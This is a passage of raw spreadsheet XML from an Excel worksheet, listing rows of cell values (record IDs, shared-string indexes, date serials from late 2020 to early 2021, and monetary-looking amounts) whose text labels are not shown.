        <v>100</v>
      </c>
      <c r="I2752" t="s">
        <v>9522</v>
      </c>
      <c r="J2752" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2753" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2753">
        <v>22566</v>
      </c>
      <c r="B2753">
        <v>979</v>
      </c>
      <c r="C2753" t="s">
        <v>3641</v>
      </c>
      <c r="D2753" t="s">
        <v>12119</v>
      </c>
      <c r="E2753">
        <v>5</v>
      </c>
      <c r="F2753" t="s">
        <v>9641</v>
      </c>
      <c r="G2753" s="1">
        <v>44155</v>
      </c>
      <c r="H2753">
        <v>10000</v>
      </c>
      <c r="I2753" t="s">
        <v>12120</v>
      </c>
      <c r="J2753" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2754" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2754">
        <v>22567</v>
      </c>
      <c r="B2754">
        <v>979</v>
      </c>
      <c r="C2754" t="s">
        <v>3641</v>
      </c>
      <c r="D2754" t="s">
        <v>12119</v>
      </c>
      <c r="E2754">
        <v>5</v>
      </c>
      <c r="F2754" t="s">
        <v>12121</v>
      </c>
      <c r="G2754" s="1">
        <v>44155</v>
      </c>
      <c r="H2754">
        <v>40000</v>
      </c>
      <c r="I2754" t="s">
        <v>12120</v>
      </c>
      <c r="J2754" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2755" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2755">
        <v>22568</v>
      </c>
      <c r="B2755">
        <v>1144</v>
      </c>
      <c r="C2755" t="s">
        <v>3264</v>
      </c>
      <c r="D2755" t="s">
        <v>11748</v>
      </c>
      <c r="E2755">
        <v>16</v>
      </c>
      <c r="F2755" t="s">
        <v>5033</v>
      </c>
      <c r="G2755" s="1">
        <v>44125</v>
      </c>
      <c r="H2755">
        <v>2000</v>
      </c>
      <c r="I2755" t="s">
        <v>9536</v>
      </c>
      <c r="J2755" t="s">
        <v>12122</v>
      </c>
    </row>
    <row r="2756" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2756">
        <v>22569</v>
      </c>
      <c r="B2756">
        <v>1144</v>
      </c>
      <c r="C2756" t="s">
        <v>3264</v>
      </c>
      <c r="D2756" t="s">
        <v>11748</v>
      </c>
      <c r="E2756">
        <v>16</v>
      </c>
      <c r="F2756" t="s">
        <v>12123</v>
      </c>
      <c r="G2756" s="1">
        <v>44125</v>
      </c>
      <c r="H2756">
        <v>20000</v>
      </c>
      <c r="I2756" t="s">
        <v>9536</v>
      </c>
      <c r="J2756" t="s">
        <v>12122</v>
      </c>
    </row>
    <row r="2757" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2757">
        <v>22570</v>
      </c>
      <c r="B2757">
        <v>979</v>
      </c>
      <c r="C2757" t="s">
        <v>3641</v>
      </c>
      <c r="D2757" t="s">
        <v>12119</v>
      </c>
      <c r="E2757">
        <v>5</v>
      </c>
      <c r="F2757" t="s">
        <v>12124</v>
      </c>
      <c r="G2757" s="1">
        <v>44155</v>
      </c>
      <c r="H2757">
        <v>25000</v>
      </c>
      <c r="I2757" t="s">
        <v>12120</v>
      </c>
      <c r="J2757" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2758" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2758">
        <v>22571</v>
      </c>
      <c r="B2758">
        <v>979</v>
      </c>
      <c r="C2758" t="s">
        <v>3641</v>
      </c>
      <c r="D2758" t="s">
        <v>12119</v>
      </c>
      <c r="E2758">
        <v>5</v>
      </c>
      <c r="F2758" t="s">
        <v>7241</v>
      </c>
      <c r="G2758" s="1">
        <v>44155</v>
      </c>
      <c r="H2758">
        <v>6000</v>
      </c>
      <c r="I2758" t="s">
        <v>12120</v>
      </c>
      <c r="J2758" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2759" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2759">
        <v>22572</v>
      </c>
      <c r="B2759">
        <v>979</v>
      </c>
      <c r="C2759" t="s">
        <v>3641</v>
      </c>
      <c r="D2759" t="s">
        <v>12119</v>
      </c>
      <c r="E2759">
        <v>5</v>
      </c>
      <c r="F2759" t="s">
        <v>9672</v>
      </c>
      <c r="G2759" s="1">
        <v>44155</v>
      </c>
      <c r="H2759">
        <v>12000</v>
      </c>
      <c r="I2759" t="s">
        <v>12120</v>
      </c>
      <c r="J2759" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2760" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2760">
        <v>22573</v>
      </c>
      <c r="B2760">
        <v>1295</v>
      </c>
      <c r="C2760" t="s">
        <v>3651</v>
      </c>
      <c r="D2760" t="s">
        <v>12125</v>
      </c>
      <c r="E2760">
        <v>12</v>
      </c>
      <c r="F2760" t="s">
        <v>2236</v>
      </c>
      <c r="G2760" s="1">
        <v>44145</v>
      </c>
      <c r="H2760">
        <v>20000</v>
      </c>
      <c r="I2760" t="s">
        <v>12126</v>
      </c>
    </row>
    <row r="2761" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2761">
        <v>22574</v>
      </c>
      <c r="B2761">
        <v>1295</v>
      </c>
      <c r="C2761" t="s">
        <v>3651</v>
      </c>
      <c r="D2761" t="s">
        <v>12125</v>
      </c>
      <c r="E2761">
        <v>12</v>
      </c>
      <c r="F2761" t="s">
        <v>9437</v>
      </c>
      <c r="G2761" s="1">
        <v>44145</v>
      </c>
      <c r="H2761">
        <v>150000</v>
      </c>
      <c r="I2761" t="s">
        <v>12127</v>
      </c>
    </row>
    <row r="2762" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2762">
        <v>22575</v>
      </c>
      <c r="B2762">
        <v>1295</v>
      </c>
      <c r="C2762" t="s">
        <v>3651</v>
      </c>
      <c r="D2762" t="s">
        <v>12125</v>
      </c>
      <c r="E2762">
        <v>12</v>
      </c>
      <c r="F2762" t="s">
        <v>12128</v>
      </c>
      <c r="G2762" s="1">
        <v>44145</v>
      </c>
      <c r="H2762">
        <v>10000</v>
      </c>
      <c r="I2762" t="s">
        <v>12129</v>
      </c>
    </row>
    <row r="2763" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2763">
        <v>22576</v>
      </c>
      <c r="B2763">
        <v>1295</v>
      </c>
      <c r="C2763" t="s">
        <v>3651</v>
      </c>
      <c r="D2763" t="s">
        <v>12125</v>
      </c>
      <c r="E2763">
        <v>12</v>
      </c>
      <c r="F2763" t="s">
        <v>12130</v>
      </c>
      <c r="G2763" s="1">
        <v>44145</v>
      </c>
      <c r="H2763">
        <v>500000</v>
      </c>
      <c r="I2763" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="2764" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2764">
        <v>22577</v>
      </c>
      <c r="B2764">
        <v>761</v>
      </c>
      <c r="C2764" t="s">
        <v>1993</v>
      </c>
      <c r="D2764" t="s">
        <v>12131</v>
      </c>
      <c r="E2764">
        <v>17</v>
      </c>
      <c r="F2764" t="s">
        <v>512</v>
      </c>
      <c r="G2764" s="1">
        <v>44217</v>
      </c>
      <c r="H2764">
        <v>12000</v>
      </c>
      <c r="I2764" t="s">
        <v>12132</v>
      </c>
      <c r="J2764" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="2765" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2765">
        <v>22579</v>
      </c>
      <c r="B2765">
        <v>979</v>
      </c>
      <c r="C2765" t="s">
        <v>3641</v>
      </c>
      <c r="D2765" t="s">
        <v>12119</v>
      </c>
      <c r="E2765">
        <v>5</v>
      </c>
      <c r="F2765" t="s">
        <v>9217</v>
      </c>
      <c r="G2765" s="1">
        <v>44155</v>
      </c>
      <c r="H2765">
        <v>800</v>
      </c>
      <c r="I2765" t="s">
        <v>12120</v>
      </c>
      <c r="J2765" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2766" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2766">
        <v>22580</v>
      </c>
      <c r="B2766">
        <v>979</v>
      </c>
      <c r="C2766" t="s">
        <v>3641</v>
      </c>
      <c r="D2766" t="s">
        <v>12119</v>
      </c>
      <c r="E2766">
        <v>5</v>
      </c>
      <c r="F2766" t="s">
        <v>12133</v>
      </c>
      <c r="G2766" s="1">
        <v>44155</v>
      </c>
      <c r="H2766">
        <v>14000</v>
      </c>
      <c r="I2766" t="s">
        <v>12120</v>
      </c>
      <c r="J2766" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2767" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2767">
        <v>22581</v>
      </c>
      <c r="B2767">
        <v>979</v>
      </c>
      <c r="C2767" t="s">
        <v>3641</v>
      </c>
      <c r="D2767" t="s">
        <v>12119</v>
      </c>
      <c r="E2767">
        <v>5</v>
      </c>
      <c r="F2767" t="s">
        <v>12134</v>
      </c>
      <c r="G2767" s="1">
        <v>44155</v>
      </c>
      <c r="H2767">
        <v>50000</v>
      </c>
      <c r="I2767" t="s">
        <v>12120</v>
      </c>
      <c r="J2767" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2768" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2768">
        <v>22582</v>
      </c>
      <c r="B2768">
        <v>979</v>
      </c>
      <c r="C2768" t="s">
        <v>3641</v>
      </c>
      <c r="D2768" t="s">
        <v>12119</v>
      </c>
      <c r="E2768">
        <v>5</v>
      </c>
      <c r="F2768" t="s">
        <v>3814</v>
      </c>
      <c r="G2768" s="1">
        <v>44155</v>
      </c>
      <c r="H2768">
        <v>1800</v>
      </c>
      <c r="I2768" t="s">
        <v>12120</v>
      </c>
      <c r="J2768" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2769" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2769">
        <v>22584</v>
      </c>
      <c r="B2769">
        <v>4967</v>
      </c>
      <c r="C2769" t="s">
        <v>7691</v>
      </c>
      <c r="D2769" t="s">
        <v>12135</v>
      </c>
      <c r="E2769">
        <v>20</v>
      </c>
      <c r="F2769" t="s">
        <v>12136</v>
      </c>
      <c r="G2769" s="1">
        <v>44210</v>
      </c>
      <c r="H2769">
        <v>25000</v>
      </c>
      <c r="I2769" t="s">
        <v>11152</v>
      </c>
      <c r="J2769" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2770" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2770">
        <v>22588</v>
      </c>
      <c r="B2770">
        <v>4967</v>
      </c>
      <c r="C2770" t="s">
        <v>7691</v>
      </c>
      <c r="D2770" t="s">
        <v>12135</v>
      </c>
      <c r="E2770">
        <v>20</v>
      </c>
      <c r="F2770" t="s">
        <v>9590</v>
      </c>
      <c r="G2770" s="1">
        <v>44210</v>
      </c>
      <c r="H2770">
        <v>12000</v>
      </c>
      <c r="I2770" t="s">
        <v>11152</v>
      </c>
      <c r="J2770" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2771" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2771">
        <v>22591</v>
      </c>
      <c r="B2771">
        <v>4967</v>
      </c>
      <c r="C2771" t="s">
        <v>7691</v>
      </c>
      <c r="D2771" t="s">
        <v>12135</v>
      </c>
      <c r="E2771">
        <v>20</v>
      </c>
      <c r="F2771" t="s">
        <v>3814</v>
      </c>
      <c r="G2771" s="1">
        <v>44210</v>
      </c>
      <c r="H2771">
        <v>32000</v>
      </c>
      <c r="I2771" t="s">
        <v>11152</v>
      </c>
      <c r="J2771" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2772" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2772">
        <v>22592</v>
      </c>
      <c r="B2772">
        <v>4967</v>
      </c>
      <c r="C2772" t="s">
        <v>7691</v>
      </c>
      <c r="D2772" t="s">
        <v>12135</v>
      </c>
      <c r="E2772">
        <v>20</v>
      </c>
      <c r="F2772" t="s">
        <v>9640</v>
      </c>
      <c r="G2772" s="1">
        <v>44210</v>
      </c>
      <c r="H2772">
        <v>10000</v>
      </c>
      <c r="I2772" t="s">
        <v>11152</v>
      </c>
      <c r="J2772" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2773" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2773">
        <v>22593</v>
      </c>
      <c r="B2773">
        <v>4967</v>
      </c>
      <c r="C2773" t="s">
        <v>7691</v>
      </c>
      <c r="D2773" t="s">
        <v>12135</v>
      </c>
      <c r="E2773">
        <v>20</v>
      </c>
      <c r="F2773" t="s">
        <v>9676</v>
      </c>
      <c r="G2773" s="1">
        <v>44210</v>
      </c>
      <c r="H2773">
        <v>14000</v>
      </c>
      <c r="I2773" t="s">
        <v>11152</v>
      </c>
      <c r="J2773" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2774" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2774">
        <v>22601</v>
      </c>
      <c r="B2774">
        <v>1012</v>
      </c>
      <c r="C2774" t="s">
        <v>3497</v>
      </c>
      <c r="D2774" t="s">
        <v>12137</v>
      </c>
      <c r="E2774">
        <v>26</v>
      </c>
      <c r="F2774" t="s">
        <v>3499</v>
      </c>
      <c r="G2774" s="1">
        <v>44130</v>
      </c>
      <c r="H2774">
        <v>20000</v>
      </c>
      <c r="J2774" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="2775" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2775">
        <v>22602</v>
      </c>
      <c r="B2775">
        <v>1192</v>
      </c>
      <c r="C2775" t="s">
        <v>3616</v>
      </c>
      <c r="D2775" t="s">
        <v>12138</v>
      </c>
      <c r="E2775">
        <v>16</v>
      </c>
      <c r="F2775" t="s">
        <v>9441</v>
      </c>
      <c r="G2775" s="1">
        <v>44172</v>
      </c>
      <c r="H2775">
        <v>150000</v>
      </c>
      <c r="J2775" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="2776" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2776">
        <v>22603</v>
      </c>
      <c r="B2776">
        <v>1192</v>
      </c>
      <c r="C2776" t="s">
        <v>3616</v>
      </c>
      <c r="D2776" t="s">
        <v>12138</v>
      </c>
      <c r="E2776">
        <v>16</v>
      </c>
      <c r="F2776" t="s">
        <v>673</v>
      </c>
      <c r="G2776" s="1">
        <v>44172</v>
      </c>
      <c r="H2776">
        <v>50000</v>
      </c>
      <c r="J2776" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="2777" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2777">
        <v>22604</v>
      </c>
      <c r="B2777">
        <v>1192</v>
      </c>
      <c r="C2777" t="s">
        <v>3616</v>
      </c>
      <c r="D2777" t="s">
        <v>12138</v>
      </c>
      <c r="E2777">
        <v>16</v>
      </c>
      <c r="F2777" t="s">
        <v>12139</v>
      </c>
      <c r="G2777" s="1">
        <v>44172</v>
      </c>
      <c r="H2777">
        <v>50000</v>
      </c>
      <c r="J2777" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="2778" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2778">
        <v>22608</v>
      </c>
      <c r="B2778">
        <v>1165</v>
      </c>
      <c r="C2778" t="s">
        <v>3667</v>
      </c>
      <c r="D2778" t="s">
        <v>12140</v>
      </c>
      <c r="E2778">
        <v>16</v>
      </c>
      <c r="F2778" t="s">
        <v>673</v>
      </c>
      <c r="G2778" s="1">
        <v>44154</v>
      </c>
      <c r="H2778">
        <v>3600000</v>
      </c>
      <c r="I2778" t="s">
        <v>12141</v>
      </c>
      <c r="J2778" t="s">
        <v>10133</v>
      </c>
    </row>
    <row r="2779" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2779">
        <v>22609</v>
      </c>
      <c r="B2779">
        <v>1165</v>
      </c>
      <c r="C2779" t="s">
        <v>3667</v>
      </c>
      <c r="D2779" t="s">
        <v>12140</v>
      </c>
      <c r="E2779">
        <v>16</v>
      </c>
      <c r="F2779" t="s">
        <v>9441</v>
      </c>
      <c r="G2779" s="1">
        <v>44154</v>
      </c>
      <c r="H2779">
        <v>5400000</v>
      </c>
      <c r="J2779" t="s">
        <v>12142</v>
      </c>
    </row>
    <row r="2780" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2780">
        <v>22610</v>
      </c>
      <c r="B2780">
        <v>4882</v>
      </c>
      <c r="C2780" t="s">
        <v>7754</v>
      </c>
      <c r="D2780" t="s">
        <v>12143</v>
      </c>
      <c r="E2780">
        <v>5</v>
      </c>
      <c r="F2780" t="s">
        <v>12144</v>
      </c>
      <c r="G2780" s="1">
        <v>44224</v>
      </c>
      <c r="H2780">
        <v>150000</v>
      </c>
      <c r="I2780" t="s">
        <v>9638</v>
      </c>
      <c r="J2780" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2781" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2781">
        <v>22611</v>
      </c>
      <c r="B2781">
        <v>4882</v>
      </c>
      <c r="C2781" t="s">
        <v>7754</v>
      </c>
      <c r="D2781" t="s">
        <v>12143</v>
      </c>
      <c r="E2781">
        <v>5</v>
      </c>
      <c r="F2781" t="s">
        <v>12145</v>
      </c>
      <c r="G2781" s="1">
        <v>44224</v>
      </c>
      <c r="H2781">
        <v>150000</v>
      </c>
      <c r="I2781" t="s">
        <v>9638</v>
      </c>
      <c r="J2781" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2782" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2782">
        <v>22612</v>
      </c>
      <c r="B2782">
        <v>4882</v>
      </c>
      <c r="C2782" t="s">
        <v>7754</v>
      </c>
      <c r="D2782" t="s">
        <v>12143</v>
      </c>
      <c r="E2782">
        <v>5</v>
      </c>
      <c r="F2782" t="s">
        <v>12146</v>
      </c>
      <c r="G2782" s="1">
        <v>44224</v>
      </c>
      <c r="H2782">
        <v>100000</v>
      </c>
      <c r="I2782" t="s">
        <v>9638</v>
      </c>
      <c r="J2782" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2783" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2783">
        <v>22614</v>
      </c>
      <c r="B2783">
        <v>2604</v>
      </c>
      <c r="C2783" t="s">
        <v>5514</v>
      </c>
      <c r="D2783" t="s">
        <v>10342</v>
      </c>
      <c r="E2783">
        <v>12</v>
      </c>
      <c r="F2783" t="s">
        <v>2236</v>
      </c>
      <c r="G2783" s="1">
        <v>44119</v>
      </c>
      <c r="H2783">
        <v>100</v>
      </c>
      <c r="J2783" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2784" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2784">
        <v>22615</v>
      </c>
      <c r="B2784">
        <v>2604</v>
      </c>
      <c r="C2784" t="s">
        <v>5514</v>
      </c>
      <c r="D2784" t="s">
        <v>10342</v>
      </c>
      <c r="E2784">
        <v>12</v>
      </c>
      <c r="F2784" t="s">
        <v>12147</v>
      </c>
      <c r="G2784" s="1">
        <v>44119</v>
      </c>
      <c r="H2784">
        <v>200</v>
      </c>
      <c r="I2784" t="s">
        <v>10703</v>
      </c>
      <c r="J2784" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2785" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2785">
        <v>22616</v>
      </c>
      <c r="B2785">
        <v>2604</v>
      </c>
      <c r="C2785" t="s">
        <v>5514</v>
      </c>
      <c r="D2785" t="s">
        <v>10342</v>
      </c>
      <c r="E2785">
        <v>12</v>
      </c>
      <c r="F2785" t="s">
        <v>609</v>
      </c>
      <c r="G2785" s="1">
        <v>44119</v>
      </c>
      <c r="H2785">
        <v>100</v>
      </c>
      <c r="J2785" t="s">
        <v>11473</v>
      </c>
    </row>
    <row r="2786" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2786">
        <v>22617</v>
      </c>
      <c r="B2786">
        <v>2604</v>
      </c>
      <c r="C2786" t="s">
        <v>5514</v>
      </c>
      <c r="D2786" t="s">
        <v>10342</v>
      </c>
      <c r="E2786">
        <v>12</v>
      </c>
      <c r="F2786" t="s">
        <v>12148</v>
      </c>
      <c r="G2786" s="1">
        <v>44119</v>
      </c>
      <c r="H2786">
        <v>100</v>
      </c>
      <c r="J2786" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2787" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2787">
        <v>22618</v>
      </c>
      <c r="B2787">
        <v>1107</v>
      </c>
      <c r="C2787" t="s">
        <v>3542</v>
      </c>
      <c r="D2787" t="s">
        <v>12149</v>
      </c>
      <c r="E2787">
        <v>12</v>
      </c>
      <c r="F2787" t="s">
        <v>11027</v>
      </c>
      <c r="G2787" s="1">
        <v>44123</v>
      </c>
      <c r="H2787">
        <v>1200000</v>
      </c>
      <c r="J2787" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="2788" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2788">
        <v>22619</v>
      </c>
      <c r="B2788">
        <v>1107</v>
      </c>
      <c r="C2788" t="s">
        <v>3542</v>
      </c>
      <c r="D2788" t="s">
        <v>12149</v>
      </c>
      <c r="E2788">
        <v>12</v>
      </c>
      <c r="F2788" t="s">
        <v>11210</v>
      </c>
      <c r="G2788" s="1">
        <v>44123</v>
      </c>
      <c r="H2788">
        <v>150000</v>
      </c>
      <c r="J2788" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="2789" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2789">
        <v>22620</v>
      </c>
      <c r="B2789">
        <v>1107</v>
      </c>
      <c r="C2789" t="s">
        <v>3542</v>
      </c>
      <c r="D2789" t="s">
        <v>12149</v>
      </c>
      <c r="E2789">
        <v>12</v>
      </c>
      <c r="F2789" t="s">
        <v>12150</v>
      </c>
      <c r="G2789" s="1">
        <v>44123</v>
      </c>
      <c r="H2789">
        <v>200000</v>
      </c>
      <c r="J2789" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="2790" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2790">
        <v>22621</v>
      </c>
      <c r="B2790">
        <v>1107</v>
      </c>
      <c r="C2790" t="s">
        <v>3542</v>
      </c>
      <c r="D2790" t="s">
        <v>12149</v>
      </c>
      <c r="E2790">
        <v>12</v>
      </c>
      <c r="F2790" t="s">
        <v>9590</v>
      </c>
      <c r="G2790" s="1">
        <v>44130</v>
      </c>
      <c r="H2790">
        <v>50000</v>
      </c>
    </row>
    <row r="2791" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2791">
        <v>22622</v>
      </c>
      <c r="B2791">
        <v>1107</v>
      </c>
      <c r="C2791" t="s">
        <v>3542</v>
      </c>
      <c r="D2791" t="s">
        <v>12149</v>
      </c>
      <c r="E2791">
        <v>12</v>
      </c>
      <c r="F2791" t="s">
        <v>9672</v>
      </c>
      <c r="G2791" s="1">
        <v>44130</v>
      </c>
      <c r="H2791">
        <v>75000</v>
      </c>
      <c r="I2791" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2792" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2792">
        <v>22623</v>
      </c>
      <c r="B2792">
        <v>1265</v>
      </c>
      <c r="C2792" t="s">
        <v>3607</v>
      </c>
      <c r="D2792" t="s">
        <v>12046</v>
      </c>
      <c r="E2792">
        <v>29</v>
      </c>
      <c r="F2792" t="s">
        <v>12151</v>
      </c>
      <c r="G2792" s="1">
        <v>44126</v>
      </c>
      <c r="H2792">
        <v>3000</v>
      </c>
      <c r="J2792" t="s">
        <v>12152</v>
      </c>
    </row>
    <row r="2793" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2793">
        <v>22624</v>
      </c>
      <c r="B2793">
        <v>1083</v>
      </c>
      <c r="C2793" t="s">
        <v>3671</v>
      </c>
      <c r="D2793" t="s">
        <v>12153</v>
      </c>
      <c r="E2793">
        <v>14</v>
      </c>
      <c r="F2793" t="s">
        <v>3673</v>
      </c>
      <c r="G2793" s="1">
        <v>44173</v>
      </c>
      <c r="H2793">
        <v>587500</v>
      </c>
      <c r="J2793" t="s">
        <v>12154</v>
      </c>
    </row>
    <row r="2794" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2794">
        <v>22625</v>
      </c>
      <c r="B2794">
        <v>1166</v>
      </c>
      <c r="C2794" t="s">
        <v>3678</v>
      </c>
      <c r="D2794" t="s">
        <v>12155</v>
      </c>
      <c r="E2794">
        <v>16</v>
      </c>
      <c r="F2794" t="s">
        <v>673</v>
      </c>
      <c r="G2794" s="1">
        <v>44155</v>
      </c>
      <c r="H2794">
        <v>3600000</v>
      </c>
      <c r="J2794" t="s">
        <v>10133</v>
      </c>
    </row>
    <row r="2795" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2795">
        <v>22626</v>
      </c>
      <c r="B2795">
        <v>1166</v>
      </c>
      <c r="C2795" t="s">
        <v>3678</v>
      </c>
      <c r="D2795" t="s">
        <v>12155</v>
      </c>
      <c r="E2795">
        <v>16</v>
      </c>
      <c r="F2795" t="s">
        <v>9441</v>
      </c>
      <c r="G2795" s="1">
        <v>44155</v>
      </c>
      <c r="H2795">
        <v>5400000</v>
      </c>
      <c r="J2795" t="s">
        <v>10133</v>
      </c>
    </row>
    <row r="2796" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2796">
        <v>22627</v>
      </c>
      <c r="B2796">
        <v>1300</v>
      </c>
      <c r="C2796" t="s">
        <v>16452</v>
      </c>
      <c r="D2796" t="s">
        <v>16453</v>
      </c>
      <c r="E2796">
        <v>12</v>
      </c>
      <c r="F2796" t="s">
        <v>3686</v>
      </c>
      <c r="G2796" s="1">
        <v>44183</v>
      </c>
      <c r="H2796" s="4">
        <v>20000</v>
      </c>
      <c r="I2796" t="s">
        <v>12156</v>
      </c>
    </row>
    <row r="2797" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2797">
        <v>22628</v>
      </c>
      <c r="B2797">
        <v>1069</v>
      </c>
      <c r="C2797" t="s">
        <v>3663</v>
      </c>
      <c r="D2797" t="s">
        <v>12157</v>
      </c>
      <c r="E2797">
        <v>11</v>
      </c>
      <c r="F2797" t="s">
        <v>9466</v>
      </c>
      <c r="G2797" s="1">
        <v>44131</v>
      </c>
      <c r="H2797">
        <v>2000</v>
      </c>
      <c r="J2797" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="2798" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2798">
        <v>22629</v>
      </c>
      <c r="B2798">
        <v>1069</v>
      </c>
      <c r="C2798" t="s">
        <v>3663</v>
      </c>
      <c r="D2798" t="s">
        <v>12157</v>
      </c>
      <c r="E2798">
        <v>11</v>
      </c>
      <c r="F2798" t="s">
        <v>12158</v>
      </c>
      <c r="G2798" s="1">
        <v>44131</v>
      </c>
      <c r="H2798">
        <v>2000</v>
      </c>
      <c r="J2798" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="2799" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2799">
        <v>22630</v>
      </c>
      <c r="B2799">
        <v>1069</v>
      </c>
      <c r="C2799" t="s">
        <v>3663</v>
      </c>
      <c r="D2799" t="s">
        <v>12157</v>
      </c>
      <c r="E2799">
        <v>11</v>
      </c>
      <c r="F2799" t="s">
        <v>11753</v>
      </c>
      <c r="G2799" s="1">
        <v>44131</v>
      </c>
      <c r="H2799">
        <v>2000</v>
      </c>
      <c r="J2799" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="2800" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2800">
        <v>22631</v>
      </c>
      <c r="B2800">
        <v>1069</v>
      </c>
      <c r="C2800" t="s">
        <v>3663</v>
      </c>
      <c r="D2800" t="s">
        <v>12157</v>
      </c>
      <c r="E2800">
        <v>11</v>
      </c>
      <c r="F2800" t="s">
        <v>512</v>
      </c>
      <c r="G2800" s="1">
        <v>44131</v>
      </c>
      <c r="H2800">
        <v>2000</v>
      </c>
      <c r="J2800" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="2801" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2801">
        <v>22632</v>
      </c>
      <c r="B2801">
        <v>1069</v>
      </c>
      <c r="C2801" t="s">
        <v>3663</v>
      </c>
      <c r="D2801" t="s">
        <v>12157</v>
      </c>
      <c r="E2801">
        <v>11</v>
      </c>
      <c r="F2801" t="s">
        <v>9217</v>
      </c>
      <c r="G2801" s="1">
        <v>44131</v>
      </c>
      <c r="H2801">
        <v>5000</v>
      </c>
      <c r="J2801" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2802" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2802">
        <v>22633</v>
      </c>
      <c r="B2802">
        <v>1069</v>
      </c>
      <c r="C2802" t="s">
        <v>3663</v>
      </c>
      <c r="D2802" t="s">
        <v>12157</v>
      </c>
      <c r="E2802">
        <v>11</v>
      </c>
      <c r="F2802" t="s">
        <v>7613</v>
      </c>
      <c r="G2802" s="1">
        <v>44131</v>
      </c>
      <c r="H2802">
        <v>2000</v>
      </c>
      <c r="J2802" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="2803" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2803">
        <v>22634</v>
      </c>
      <c r="B2803">
        <v>1069</v>
      </c>
      <c r="C2803" t="s">
        <v>3663</v>
      </c>
      <c r="D2803" t="s">
        <v>12157</v>
      </c>
      <c r="E2803">
        <v>11</v>
      </c>
      <c r="F2803" t="s">
        <v>9454</v>
      </c>
      <c r="G2803" s="1">
        <v>44131</v>
      </c>
      <c r="H2803">
        <v>3000</v>
      </c>
      <c r="J2803" t="s">
        <v>12159</v>
      </c>
    </row>
    <row r="2804" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2804">
